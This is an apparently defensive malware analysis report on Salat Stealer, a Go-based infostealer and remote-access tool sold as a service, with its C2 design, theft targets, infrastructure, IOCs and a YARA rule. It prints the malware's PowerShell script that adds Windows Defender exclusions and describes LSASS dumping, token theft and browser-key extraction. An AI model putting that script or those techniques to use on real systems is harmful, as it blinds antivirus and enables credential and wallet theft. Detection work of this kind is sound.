Salat Stealer: Go-Compiled RAT with DNS-over-HTTPS C2 Resolution, 62 Crypto Wallet Extensions, and a Live MaaS Panel on Russian Infrastructure
TL;DR: Salat Stealer is a UPX-packed Go binary that combines a full-featured RAT (remote shell, keylogger, screen/webcam/mic capture, SOCKS5 proxy) with an aggressive infostealer targeting 30+ browsers, 24+ crypto wallets, and 62 Chrome extension IDs. The C2 domain is encrypted in the binary and resolved at runtime via DNS-over-HTTPS, defeating traditional DNS blocklists. Infrastructure probing revealed a live MaaS (Malware-as-a-Service) operation run by "NyashTeam" across Cloudflare-fronted domains and Beget LLC backends in Saint Petersburg, with a previously undocumented domain (sa1at[.]ru) discovered through TLS certificate SAN enumeration.
Campaign Overview
SalatStealer is not a standalone tool -- it is the payload arm of a MaaS platform operated under the "NyashTeam" / "WebRat" brand. The operator portal at nyash[.]team advertises itself as the "OFFICIAL WebRat RESEL" (reseller), with sales and support conducted through two Telegram bots. The C2 infrastructure uses a tiered architecture: Cloudflare-fronted domains for data exfiltration, direct-IP Beget backends for API and panel operations, and a now-offline FirstVDS admin panel that was likely relocated after researcher attention.
Two samples were analyzed: a binary analysis of the unpacked PE and a live infrastructure probe of all known C2 domains.
Sample Overview
| Property | Sample 1 (Panel Probe) | Sample 2 (Binary Analysis) |
|---|---|---|
| SHA-256 | ec2e071a6241ac4d12452070c37ffde5bd01650c6d9a5503d768cb583fea6756 | 30a50cc0f7b317c9734e6792e7e4ec174035d92031bdcc87a80ad8826adc60b2 |
| MD5 | 62d42b8788f958885cfd34428d29d7e1 | -- |
| SHA-1 | 3a0c59c4b26e9fdff15170f16d6317693b87ca5c | -- |
| Size | 3.5 MB | 3.3 MB packed / 11.7 MB unpacked |
| Format | PE32 (GUI), Intel 80386 | PE32 (GUI), Intel 80386, UPX |
| Compiler | Go | Go 1.18+ (GOOS=windows, 32-bit) |
| UPX Ratio | -- | 28.25% |
| Sandbox Score | 9/10 (Triage) | -- |
| Tags | stealer, spyware, adware, credential_access, upx | -- |
The bc.exe filename observed in a second Triage submission suggests the binary is distributed under different names to affiliates. System language and location discovery TTPs in that submission indicate geo-targeting or geo-fencing behavior.
C2 Architecture: DNS-over-HTTPS Domain Resolution
The most notable evasion technique is the C2 resolution mechanism. SalatStealer does not store its C2 domain in plaintext. Instead, the domain is encrypted via a custom main.dec function and resolved at runtime through DNS-over-HTTPS (DoH), bypassing traditional DNS monitoring and sinkholing entirely.
The resolution chain works as follows:
1. main.dec() decrypts embedded C2 domain from .rdata blob
2. main.getBestMethod() tests DoH resolver availability (probes google.com)
3. main.getEp() resolves decrypted domain via selected DoH provider
4. main.initConnection() establishes WebSocket session to resolved IP
DoH resolver fallback chain:
https://cloudflare-dns.com/dns-query?name=<c2_domain>
https://dns.google/resolve?name=<c2_domain>
https://1.1.1.1/dns-query?name=<c2_domain>
Fallback: 127.0.0.1:53 (local resolver)
The key functions involved:
| Function | Purpose |
|---|---|
main.getEp | Resolve C2 endpoint via DoH |
main.initConnection | Establish WebSocket connection |
main.changeEndpoint | Dynamic endpoint rotation during session |
main.c2Server | Global variable holding current C2 address |
main.dec / dec.func1 | Custom decryption for embedded config |
main.getBestMethod | Test DoH provider availability |
The transport layer uses gorilla/websocket over HTTPS with QUIC/HTTP3 support (via quic-go). The C2 path is /saat/ with a WebSocket session protocol (wsSess) for bidirectional command execution.
WebSocket command protocol (extracted from strings):
postOpen - Initial connection handshake
/config - Retrieve configuration from C2
_gateway - Connection management
shutdown - Terminate connection
taskkill - Remote process kill
ConnectCache - Cache connection state
An anti-analysis marker was embedded as the build identifier: dQw4w9WgXcQ -- a YouTube rickroll video ID.
Encrypted Configuration
A 3,268-byte base64 blob at .rdata offset 0x0059ae77 contains an XOR/AES-encrypted configuration decrypted at runtime by main.dec. This blob holds connection parameters, affiliate configuration, and targeting rules.
A separate 1,984-byte blob contains 62 concatenated Chrome extension IDs (32 characters each) for cryptocurrency wallet targeting. Partially identified extensions:
| Extension ID Prefix | Wallet |
|---|---|
nkbihfbeogaeaoe... | MetaMask |
ejbalbakoplchlg... | MetaMask-related |
ibnejdfjmmkpcnlp... | Phantom (Solana) |
App-Bound Encryption (APPB) Key IDs for Chromium cookie/credential decryption:
D877F783D5D3EF8C (with \configs and \maps variants)
A7FDF864FBC10B77 (with \configs and \maps variants)
F8806DD0C461824F (with \configs and \maps variants)
C2B05980D9127787 (with \configs and \maps variants)
0CA814316818D8F6 (with \configs and \maps variants)
Decoded APPB key identifier: V0VCUl9BSU40TlBLU01JMTY= -> WEBR_AIN4NPKSMI16
Windows Defender Evasion
An embedded base64-encoded PowerShell script adds broad Defender exclusions at runtime:
try {
if (Get-Command Add-MpPreference -ErrorAction SilentlyContinue) {
$ProgramFiles = [System.Environment]::GetFolderPath("ProgramFilesX86")
$updpath = $ProgramFiles -replace " \(x86\)", ""
Add-MpPreference -ExclusionPath $updpath
$ProgramFilesX86 = [System.Environment]::GetFolderPath("ProgramFilesX86")
if (Test-Path $ProgramFilesX86) {
Add-MpPreference -ExclusionPath $ProgramFilesX86
}
$AppData = [System.Environment]::GetFolderPath("ApplicationData")
Add-MpPreference -ExclusionPath $AppData
$LocalAppData = [System.Environment]::GetFolderPath("LocalApplicationData")
Add-MpPreference -ExclusionPath $LocalAppData
}
}
catch {}
This blankets C:\Program Files, C:\Program Files (x86), %AppData%, and %LocalAppData% -- effectively blinding Defender to anything dropped in standard application directories.
Credential and Data Theft
Chromium Browsers (25+ targets)
Chrome, Chrome (x86), Brave, Edge, Opera, Yandex, Vivaldi, Chromium, CentBrowser, Thorium, Iridium, Amigo, Torch, Orbitum, K-Melon, Slimjet, Elements Browser, Epic Privacy Browser, Chedot, Kometa, liebao, Maxthon3, QIP Surf, UR Browser, Sputnik, DCBrowser.
Data exfiltrated: Cookies, Login Data, Web Data (autofill), Local State, authentication tokens. Decryption via DPAPI and App-Bound Encryption key extraction through COM elevation service abuse (IElevator, IElevatorBrave, IElevatorEdge).
Gecko/Firefox Browsers (7+ targets)
Firefox, Waterfox, K-Meleon, Cyberfox, BlackHaw, SeaMonkey, IceDragon, Pale Moon, Thunderbird.
Data exfiltrated: logins.json, key4.db, cookies, nssPrivate. Decryption via NSS PBE (PKCS#5), DES3, AES-128-CBC. Credential extraction uses SELECT a11, a102 against the NSS private key database.
Cryptocurrency Wallets (24+ applications)
AtomicWallet, Jaxx Liberty, TerraStation, Trust Wallet, Coinomi, MetaMask, MetaMask2, TonKeeper, SuiWallet, MyTonWallet, KardiaChain, Temple, Tezos, Tokenpocket, Bytecoin, Ethereum (keystore), Electrum, MyMonero, Coinbase, Crocobit, Starcoin, Maiar, DEFI, Liquality, Harmony.
Additionally, 62 Chrome extension IDs are targeted for wallet clipper/stealing operations. Clipboard monitoring detects Bitcoin addresses in two formats (bc1 bech32 and legacy) via getBC1/getBC2 functions, and also monitors for tg:// URLs.
Messaging and Gaming
- Telegram Desktop:
tdatafolder exfiltration (both standard and UWP variants) - Discord: Token extraction
- Steam:
SteamTokens.txt,SteamPath,config.vdfparsing
RAT Capabilities
Beyond info-stealing, SalatStealer is a full-featured RAT:
| Capability | Functions | Method |
|---|---|---|
| Remote Shell | startShell, stopShell, shellCommand, sendShellCommand | cmd.exe |
| Screen Capture | screenStream, sendScreen, getScreen | salat/screenshot package |
| Webcam | ffwcam | ffmpeg |
| Desktop Recording | ffdesktop, sepDesktop | ffmpeg |
| Microphone | ffwmic, getMics | ffmpeg |
| Keylogger | startKeylogger, stopKeylogger, runKeylogger, klog | SetWinEventHook, keyPressCallback, windowChangeCallback |
| File Operations | downloadFile, downloadFileUnsafe, zipFiles, unzip | Direct download |
| Process Control | taskkill, findProcessByName, suspendProcessThreads | Windows API |
| SOCKS5 Proxy | socks5Conn, p2pSocks, proxySocks, forward | P2P tunneling |
| Task Scheduling | doTask, newTask, updTaskStatus | Windows Task Scheduler |
| Persistence | staticinstall | Registry Run key (SOFTWARE\Microsoft\Windows\CurrentVersion\Run) |
| Self-Destruct | selfDelete, Suicide | Anti-forensics |
Privilege Escalation
SalatStealer implements multiple privilege escalation paths:
- LSASS targeting:
findLsassProcess,impersonateSystem,readProcFile-- direct LSASS memory reading for credential dumping - Token manipulation:
DuplicateUserTokenFromSessionID,getSystemToken-- token theft from high-privilege processes - Privilege adjustment:
RtlAdjustPrivilege,enablePrivilege-- enabling SeDebugPrivilege and similar - COM elevation abuse:
IElevator,IElevatorBrave,IElevatorEdge-- exploiting browser elevation COM services to extract App-Bound Encryption keys - Process unlocking:
unlockProcsvia Restart Manager API (RmGetList) -- killing processes that hold file locks
Target processes for token impersonation:
explorer.exe, svchost.exe, snss.exe, csrss.exe, services.exe,
lsass.exe, taskhostg.exe, taskhost.exe, audiodg.exe, wininit.exe,
spoolsv.exe, dwm.exe
Infrastructure: A Three-Tier MaaS Operation
Live probing on 2026-03-06 revealed a tiered infrastructure with clear separation between public-facing C2 domains, backend servers, and the admin panel.
Tier 1: Cloudflare-Fronted C2 Domains
| Domain | Status | Purpose |
|---|---|---|
salator[.]es | FLAGGED (Cloudflare phishing interstitial, HTTP 403) | Data exfiltration |
websalat[.]top | FLAGGED (Cloudflare phishing interstitial, HTTP 403) | Data exfiltration |
salat[.]cn | ACTIVE (HTTP 404, Access-Control-Allow-Origin: *) | Data exfiltration -- unflagged |
nyash[.]team | ACTIVE | Operator/reseller portal |
Cloudflare has flagged two of four C2 domains, but salat[.]cn remains active and unflagged -- likely the current primary exfiltration endpoint. The Access-Control-Allow-Origin: * header on salat[.]cn confirms it is an active API endpoint.
Tier 2: Direct Beget Backends
| IP | Server | Domains Served | Status |
|---|---|---|---|
85.198.98.75 | Angie (Debian, OpenSSH 9.2p1) | wrat[.]in, sa1at[.]ru | LIVE |
217.26.28.234 | Angie | Backend API | LIVE |
109.172.46.120 | nginx 1.29.5 | Former wrat[.]in host | Decommissioned |
All backend servers are hosted on Beget LLC (AS198610) shared hosting in Saint Petersburg, running Angie -- a Russian fork of nginx (https://angie.software/). The operator rotates IPs within the same ASN while maintaining Beget as the sole backend provider.
Tier 3: Admin Panel (Offline)
The original admin panel at 62.109.0.189 (FirstVDS / JSC IOT, AS29182, Moscow) is completely unreachable -- no open ports detected on Shodan, all connection attempts timeout. Reverse DNS resolves to server.fvds.ru. The operator likely relocated this panel after researcher attention.
New Domain Discovery: sa1at[.]ru
TLS certificate SAN enumeration on wrat[.]in revealed a previously undocumented domain:
Subject: CN = wrat.in
SAN: DNS:sa1at.ru, DNS:wrat.in
Issuer: Let's Encrypt E8
Valid: 2026-01-22 to 2026-04-22
sa1at[.]ru is a leet-speak alias for "salat" (1=l), resolving to the same Beget IP (85.198.98.75) and running Angie. CT log history shows the domain has been active since December 2024, making it the oldest domain in the infrastructure. It was not present in any prior IOC publications.
URL Path Structure: Affiliate Model
urlscan.io submissions reveal a consistent C2 path pattern across all domains:
salator.es/sa1at/y/
salator.es/sa1at/l/
salator.es/sa1at/2or/
websalat.top/sa1at/008
wrat.in/sa1at/8q
wrat.in/sa1at/v
wrat.in/login/
The /sa1at/ path prefix is the data exfiltration endpoint. The suffixes (y, l, 2or, 008, 8q, v) are customer/affiliate IDs in the MaaS panel -- each suffix routes stolen data to a different buyer's panel view. The /login/ path confirms an admin panel interface.
NyashTeam Operator Portal
nyash[.]team is the public-facing MaaS storefront branded as the "OFFICIAL WebRat RESEL" (reseller). Communications and sales are conducted via two Telegram bots:
@nyashsupbot-- support@nyash_team_bot-- sales and comms
The site includes "OferΡΠ°" (Russian terms of service). 32 urlscan.io submissions indicate heavy researcher monitoring.
Certificate Intelligence
| Domain | Issuer | First Cert (CT Log) | SANs |
|---|---|---|---|
sa1at[.]ru | Let's Encrypt E8 | 2024-12-20 | wrat.in, sa1at.ru |
salat[.]cn | Google Trust WE1 | 2024-09-17 | *.salat.cn |
websalat[.]top | Google Trust WE1 | 2025-06-29 | *.websalat.top |
wrat[.]in | Let's Encrypt E8 | 2025-08-28 | wrat.in, sa1at.ru |
nyash[.]team | Google Trust WE1 | 2025-08-29 | *.nyash.team |
salator[.]es | Google Trust WE1 | 2025-10-29 | *.salator.es |
Dual-issuer strategy: Cloudflare-fronted domains receive Google Trust Services + Sectigo (automated by Cloudflare), while direct-IP domains use Let's Encrypt (certbot). The shared cert between wrat[.]in and sa1at[.]ru was the key pivot for the new domain discovery.
Go Module Dependencies
The binary links against the following Go modules, revealing implementation details:
| Module | Purpose |
|---|---|
github.com/gorilla/websocket | WebSocket C2 communication |
github.com/quic-go/quic-go | QUIC/HTTP3 protocol support |
github.com/ncruces/go-sqlite3 | Browser SQLite database parsing |
github.com/tetratelabs/wazero | WebAssembly runtime (SQLite WASM) |
github.com/StackExchange/wmi | WMI queries for system info |
github.com/go-ole/go-ole | COM/OLE automation (IElevator abuse) |
github.com/capnspacehook/taskmaster | Windows Task Scheduler persistence |
github.com/andygrunwald/vdf | Valve Data Format (Steam config parsing) |
github.com/buger/jsonparser | JSON parsing (C2 comms, DoH responses) |
github.com/lxn/win | Win32 API bindings |
github.com/nfnt/resize | Image resizing (screenshot optimization) |
MITRE ATT&CK Mapping
| Technique | ID | Implementation |
|---|---|---|
| Modify Registry | T1112 | Registry Run key persistence, Defender exclusion bypass |
| Virtualization/Sandbox Evasion | T1497 | VirtualBox/VMware registry key checks, ACPI enumeration |
| Credentials in Files | T1552.001 | Browser profile data, wallet files |
| Credentials from Web Browsers | T1555.003 | DPAPI, NSS PBE, APPB decryption |
| Query Registry | T1012 | VM detection, system configuration |
| System Information Discovery | T1082 | Win32_Processor, Win32_LogonSession, HWID |
| Browser Information Discovery | T1217 | 30+ browser data directories |
| Data from Local System | T1005 | Wallet files, Telegram tdata, Steam configs |
| System Location Discovery | T1614 | Geo-targeting/geo-fencing |
| System Language Discovery | T1614.001 | Language-based targeting |
| Input Capture: Keylogging | T1056.001 | SetWinEventHook, keyPressCallback |
| Screen Capture | T1113 | salat/screenshot package, ffmpeg |
| Video Capture | T1125 | ffwcam via ffmpeg |
| Audio Capture | T1123 | ffwmic via ffmpeg |
| Process Injection | T1055 | WriteProcessMemory, SetWindowsHookEx |
| OS Credential Dumping: LSASS Memory | T1003.001 | findLsassProcess, impersonateSystem |
| Access Token Manipulation | T1134 | DuplicateUserTokenFromSessionID, getSystemToken |
| Scheduled Task/Job | T1053.005 | capnspacehook/taskmaster |
| Application Layer Protocol: Web Protocols | T1071.001 | WebSocket over HTTPS, QUIC |
| Encrypted Channel | T1573 | TLS 1.3, DoH for domain resolution |
| Proxy: Multi-hop Proxy | T1090.003 | SOCKS5 proxy, P2P tunneling |
| Clipboard Data | T1115 | Bitcoin address detection and replacement |
| Software Packing | T1027.002 | UPX compression |
IOCs
File Hashes
# SHA-256
ec2e071a6241ac4d12452070c37ffde5bd01650c6d9a5503d768cb583fea6756
30a50cc0f7b317c9734e6792e7e4ec174035d92031bdcc87a80ad8826adc60b2
# MD5
62d42b8788f958885cfd34428d29d7e1
# SHA-1
3a0c59c4b26e9fdff15170f16d6317693b87ca5c
Domains
salator[.]es # C2 β Cloudflare, FLAGGED
websalat[.]top # C2 β Cloudflare, FLAGGED
salat[.]cn # C2 β Cloudflare, ACTIVE (unflagged)
wrat[.]in # C2 β direct to 85.198.98.75
sa1at[.]ru # C2 β direct to 85.198.98.75 (NEW β discovered via TLS SAN)
nyash[.]team # MaaS operator/reseller portal
IP Addresses
85.198.98.75 # Backend β LIVE (Beget AS198610, Saint Petersburg)
217.26.28.234 # Backend β LIVE (Beget AS198610, Saint Petersburg)
62.109.0.189 # Admin panel β OFFLINE (FirstVDS/JSC IOT AS29182, Moscow)
109.172.46.120 # Former backend β decommissioned (Beget AS198610)
Telegram
@nyashsupbot # NyashTeam support bot
@nyash_team_bot # NyashTeam sales/comms bot
URL Patterns
/sa1at/<affiliate_id> # Data exfiltration endpoint (observed: y, l, 2or, 008, 8q, v)
/saat/ # C2 WebSocket path (from binary)
/login/ # Admin panel login
Network Signatures
# DoH resolution URLs
https://cloudflare-dns.com/dns-query?name=<c2_domain>
https://dns.google/resolve?name=<c2_domain>
https://1.1.1.1/dns-query?name=<c2_domain>
# QUIC TLS fingerprint
sxxuJBrIRnKNqcH6xJNmUc/7lE0UOrgWJ2vMbaAoR4c=
# Server header
Server: Angie
# APPB key identifier
WEBR_AIN4NPKSMI16
YARA (Behavioral)
rule SalatStealer_Go_Stealer {
meta:
description = "SalatStealer Go-compiled infostealer/RAT"
author = "breakglass.intelligence"
date = "2026-03-08"
hash1 = "ec2e071a6241ac4d12452070c37ffde5bd01650c6d9a5503d768cb583fea6756"
hash2 = "30a50cc0f7b317c9734e6792e7e4ec174035d92031bdcc87a80ad8826adc60b2"
strings:
$ws1 = "gorilla/websocket" ascii
$doh1 = "cloudflare-dns.com/dns-query" ascii
$doh2 = "dns.google/resolve" ascii
$path = "/saat/" ascii
$func1 = "main.getEp" ascii
$func2 = "main.initConnection" ascii
$func3 = "main.changeEndpoint" ascii
$func4 = "main.getBestMethod" ascii
$klog = "startKeylogger" ascii
$shell = "startShell" ascii
$socks = "socks5Conn" ascii
$suicide = "selfDelete" ascii
$appb = "WEBR_AIN4NPKSMI16" ascii
$rick = "dQw4w9WgXcQ" ascii
condition:
uint16(0) == 0x5A4D and
filesize > 2MB and
3 of ($func*) and
2 of ($doh*, $path, $ws1) and
2 of ($klog, $shell, $socks, $suicide)
}
Analysis conducted 2026-03-06 through 2026-03-08 by breakglass.intelligence. Infrastructure was live at time of probing. The newly discovered domain sa1at[.]ru has been submitted to community blocklists.